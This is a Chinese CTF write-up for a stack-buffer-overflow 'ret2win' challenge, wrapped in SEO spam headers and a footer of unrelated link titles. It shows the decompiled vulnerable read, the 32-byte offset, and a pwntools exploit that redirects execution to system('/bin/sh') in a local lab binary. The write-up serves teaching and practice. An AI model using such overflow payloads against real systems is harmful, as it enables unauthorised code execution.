当前位置: 首页 > news >正文

遇到钓鱼网站怎么做厦门seo排名公司

news 2026/4/7 21:12:15
遇到钓鱼网站怎么做,厦门seo排名公司,网站开发专业就业指导,深圳龙岗区地图文章目录 二进制下载检查分析运行二进制ida分析解题思路exp 二进制下载 下载地址:传送门 检查分析 [rootningan 3rd]# file pwn pwn: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for …

文章目录

  • 二进制下载
  • 检查分析
  • 运行二进制
  • ida分析
  • 解题思路
  • exp

二进制下载

下载地址:传送门

检查分析

[root@ningan 3rd]# file pwn
pwn: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=b1ddcb889cf95991ae5345be73afb83771de5855, not stripped
[root@ningan 3rd]#
[root@ningan 3rd]# checksec pwn
[!] Could not populate PLT: future feature annotations is not defined (unicorn.py, line 2)
[*] '/root/ctf/awd/3rd/pwn'Arch:     amd64-64-littleRELRO:    Partial RELROStack:    No canary foundNX:       NX enabledPIE:      No PIE (0x400000)

可以看到,安全防护还是比较弱的

运行二进制

[root@ningan 3rd]# ./pwn
Your goal is to call `win` function (located at 0x400861)[ Address ]           [ Stack ]+--------------------+
0x00007ffd6f5c6950 | 0x00007f4272c70b40 | <-- buf+--------------------+
0x00007ffd6f5c6958 | 0x0000000000000000 |+--------------------+
0x00007ffd6f5c6960 | 0x0000000000000000 |+--------------------+
0x00007ffd6f5c6968 | 0x00007f4272e8b170 |+--------------------+
0x00007ffd6f5c6970 | 0x00007ffd6f5c6980 | <-- saved rbp (vuln)+--------------------+
0x00007ffd6f5c6978 | 0x000000000040084e | <-- return address (vuln)+--------------------+
0x00007ffd6f5c6980 | 0x0000000000400ad0 | <-- saved rbp (main)+--------------------+
0x00007ffd6f5c6988 | 0x00007f4272890c87 | <-- return address (main)+--------------------+
0x00007ffd6f5c6990 | 0x0000000000000001 |+--------------------+
0x00007ffd6f5c6998 | 0x00007ffd6f5c6a68 |+--------------------+Input: 123456[ Address ]           [ Stack ]+--------------------+
0x00007ffd6f5c6950 | 0x000a363534333231 | <-- buf+--------------------+
0x00007ffd6f5c6958 | 0x0000000000000000 |+--------------------+
0x00007ffd6f5c6960 | 0x0000000000000000 |+--------------------+
0x00007ffd6f5c6968 | 0x00007f4272e8b170 |+--------------------+
0x00007ffd6f5c6970 | 0x00007ffd6f5c6980 | <-- saved rbp (vuln)+--------------------+
0x00007ffd6f5c6978 | 0x000000000040084e | <-- return address (vuln)+--------------------+
0x00007ffd6f5c6980 | 0x0000000000400ad0 | <-- saved rbp (main)+--------------------+
0x00007ffd6f5c6988 | 0x00007f4272890c87 | <-- return address (main)+--------------------+
0x00007ffd6f5c6990 | 0x0000000000000001 |+--------------------+
0x00007ffd6f5c6998 | 0x00007ffd6f5c6a68 |+--------------------+Bye!
[root@ningan 3rd]# ./pwn
Your goal is to call `win` function (located at 0x400861)[ Address ]           [ Stack ]+--------------------+
0x00007ffe0d6dd760 | 0x00007f02d1bdab40 | <-- buf+--------------------+
0x00007ffe0d6dd768 | 0x0000000000000000 |+--------------------+
0x00007ffe0d6dd770 | 0x0000000000000000 |+--------------------+
0x00007ffe0d6dd778 | 0x00007f02d1df5170 |+--------------------+
0x00007ffe0d6dd780 | 0x00007ffe0d6dd790 | <-- saved rbp (vuln)+--------------------+
0x00007ffe0d6dd788 | 0x000000000040084e | <-- return address (vuln)+--------------------+
0x00007ffe0d6dd790 | 0x0000000000400ad0 | <-- saved rbp (main)+--------------------+
0x00007ffe0d6dd798 | 0x00007f02d17fac87 | <-- return address (main)+--------------------+
0x00007ffe0d6dd7a0 | 0x0000000000000001 |+--------------------+
0x00007ffe0d6dd7a8 | 0x00007ffe0d6dd878 |+--------------------+Input: aaaaaaaa[ Address ]           [ Stack ]+--------------------+
0x00007ffe0d6dd760 | 0x6161616161616161 | <-- buf+--------------------+
0x00007ffe0d6dd768 | 0x000000000000000a |+--------------------+
0x00007ffe0d6dd770 | 0x0000000000000000 |+--------------------+
0x00007ffe0d6dd778 | 0x00007f02d1df5170 |+--------------------+
0x00007ffe0d6dd780 | 0x00007ffe0d6dd790 | <-- saved rbp (vuln)+--------------------+
0x00007ffe0d6dd788 | 0x000000000040084e | <-- return address (vuln)+--------------------+
0x00007ffe0d6dd790 | 0x0000000000400ad0 | <-- saved rbp (main)+--------------------+
0x00007ffe0d6dd798 | 0x00007f02d17fac87 | <-- return address (main)+--------------------+
0x00007ffe0d6dd7a0 | 0x0000000000000001 |+--------------------+
0x00007ffe0d6dd7a8 | 0x00007ffe0d6dd878 |+--------------------+Bye!

ida分析

分析main函数,发现有提示:call win函数

image.png

int __cdecl main(int argc, const char **argv, const char **envp)
{setbuf(stdin, 0LL);setbuf(stdout, 0LL);setbuf(stderr, 0LL);printf("Your goal is to call `win` function (located at %p)\n", win);vuln();puts("Bye!");return 0;
}

可以看到,读取了一些内容存到了buf变量里,然后就调用了return函数,可以用这个栈溢出漏洞来进行利用

image.png

__int64 vuln()
{char buf[32]; // [rsp+0h] [rbp-20h] BYREF_show_stack(buf);printf("Input: ");read(0, buf, 0x200uLL);return _show_stack(buf);
}

查看win函数,看到有system(“/bin/sh”)的指令,可以直接利用

image.png

void __noreturn win()
{_QWORD v0[2]; // [rsp+0h] [rbp-10h] BYREFv0[1] = v0;if ( ((unsigned __int8)v0 & 0xF) != 0 ){puts("Oops! RSP is misaligned!");puts("Some functions such as `system` use `movaps` instructions in libc-2.27 and later.");puts("This instruction fails when RSP is not a multiple of 0x10.");puts("Find a way to align RSP! You're almost there!");sleep(1u);}else{puts("Congratulations!");system("/bin/sh");}exit(0);
}

找到system(“/bin/sh”);的地址为:0x00000000004008C4

image.png

.text:00000000004008C4 48 8D 3D C4 03 00 00          lea     rdi, command                    ; "/bin/sh"
.text:00000000004008CB E8 A0 FD FF FF                call    _system

解题思路

找到填充的间隔为32

image.png

[root@ningan 3rd]# ./pwn
Your goal is to call `win` function (located at 0x400861)[ Address ]           [ Stack ]+--------------------+
0x00007ffce7496290 | 0x00007f258a829b40 | <-- buf+--------------------+
0x00007ffce7496298 | 0x0000000000000000 |+--------------------+
0x00007ffce74962a0 | 0x0000000000000000 |+--------------------+
0x00007ffce74962a8 | 0x00007f258aa44170 |+--------------------+
0x00007ffce74962b0 | 0x00007ffce74962c0 | <-- saved rbp (vuln)+--------------------+
0x00007ffce74962b8 | 0x000000000040084e | <-- return address (vuln)+--------------------+
0x00007ffce74962c0 | 0x0000000000400ad0 | <-- saved rbp (main)+--------------------+
0x00007ffce74962c8 | 0x00007f258a449c87 | <-- return address (main)+--------------------+
0x00007ffce74962d0 | 0x0000000000000001 |+--------------------+
0x00007ffce74962d8 | 0x00007ffce74963a8 |+--------------------+Input: ^C
[root@ningan 3rd]#
[root@ningan 3rd]# python
Python 3.6.9 (default, Mar 10 2023, 16:46:00)
[GCC 8.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> 0x00007ffce74962b0 - 0x00007ffce7496290
32

上面已经找到system(“/bin/sh”);的地址为:0x00000000004008C4

exp

from pwn import *io = process("./pwn")
# io = remote("xxxx", 9999)  context.arch = "amd64"
# context.log_level = "debug"padding = b'A' * 32 + b'BBBBBBBB'
return_addr = 0x00000000004008C4
payload = padding + p64(return_addr)io.recvuntil('Input: ')
io.sendline(payload)
io.interactive()
http://www.hkea.cn/news/340158/

相关文章:

  • 吴江住房和城乡建设局官方网站产品软文是什么
  • 公司网站制作设谷歌seo是什么职业
  • 北京品牌高端网站建设公司燕郊今日头条
  • 网站制作公司徐州宁波网站seo哪家好
  • 做网站基本费用大概需要多少全媒体运营师报考官网在哪里
  • 网站建设款属于什么科目营业推广策划
  • 建设网站查证书网络广告有哪些形式
  • 分布式网站开发网络销售平台排名
  • 网站建设模板购买品牌seo培训
  • 深圳网站建设 cms网站推广交换链接
  • 标准物质网站建设5118站长工具箱
  • 做一个能注册用户的网站网络推广费用大概价格
  • 网站建设评价东莞谷歌推广
  • php网站后台进不去百度推广入口官网
  • 个人网站一键生成免费推广网站有哪些
  • 厦门做网站设计电商seo优化
  • wordpress视频点播seo技术是干什么的
  • 网站推广是怎么做的网络营销专业如何
  • 平面设计线上兼职上海网站seo
  • 个性化网站定制价格今日热点
  • 做网站的艰辛免费个人网站申请
  • 网站改版需要多久网站设计与制作毕业论文范文
  • 深圳横岗网站建设网站建设的推广渠道
  • 有没有什么网站免费做名片2023年新闻小学生摘抄
  • 新网金商网站外链查询工具
  • 网站建设的进度竞价托管选择微竞价
  • 网站快速网站推广怎么做一个公司网站
  • 旅游网站模板htmlseo品牌优化整站优化
  • 方圆网站建设aso优化重要吗
  • 做购实惠网站的意义好用的搜索引擎有哪些